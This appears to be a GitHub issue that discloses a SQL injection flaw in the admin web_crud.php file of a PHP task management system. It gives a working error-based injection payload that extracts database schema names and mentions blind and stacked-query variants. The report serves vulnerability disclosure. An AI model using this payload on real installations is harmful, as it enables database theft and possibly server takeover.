You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Retrieve user input from the POST element using the PHP method on line 225 of the \admin\app\web_crud.php file. Then, the value of this element will be passed to the code without proper purification or validation, and ultimately used for database queries in the PHP method on line 225 of the \admin\app\web_crud.php file. This vulnerability may allow attackers to gain database privileges, allowing them to access a large amount of data in the database. If the other party's database has DBA privileges, it may result in server host privileges being obtained
Impact
Attackers can exploit this vulnerability to gain database privileges, which can result in a large amount of data in the database. If the other party's database has DBA privileges, it may lead to server host privileges being obtained.
DESCRIPTION
xuanluansec has discovered a serious issue in "php task management system free download" that can allow attackers to obtain large amounts of database content through SQL injection attacks.
Vulnerability details and POC
Payload
update3=yes&encryption=1&host=1&port=1&username=1&password=2&email=1&id=1' AND (SELECT * FROM(SELECT COUNT(*),CONCAT(0x01,(SELECT MID((IFNULL(CAST(schema_name AS NCHAR),0x20)),1,54) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 6,1),0x00,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)--
Running this payload will reveal the name of the database. This indicates that SQL injection vulnerability has been successfully executed in the database, allowing for database querying. Apart from error-based injection, there also exists time-based blind injection, boolean-based blind injection, and stacked query injection vulnerabilities.
The text was updated successfully, but these errors were encountered:
NAME OF AFFECTED PRODUCT(S)
Vendor Homepage
AFFECTED AND/OR FIXED VERSION(S)
submitter
Vulnerable File
VERSION(S)
Software Link
PROBLEM TYPE
Vulnerability Type
Root Cause
Impact
DESCRIPTION
Vulnerability details and POC
Payload
The text was updated successfully, but these errors were encountered: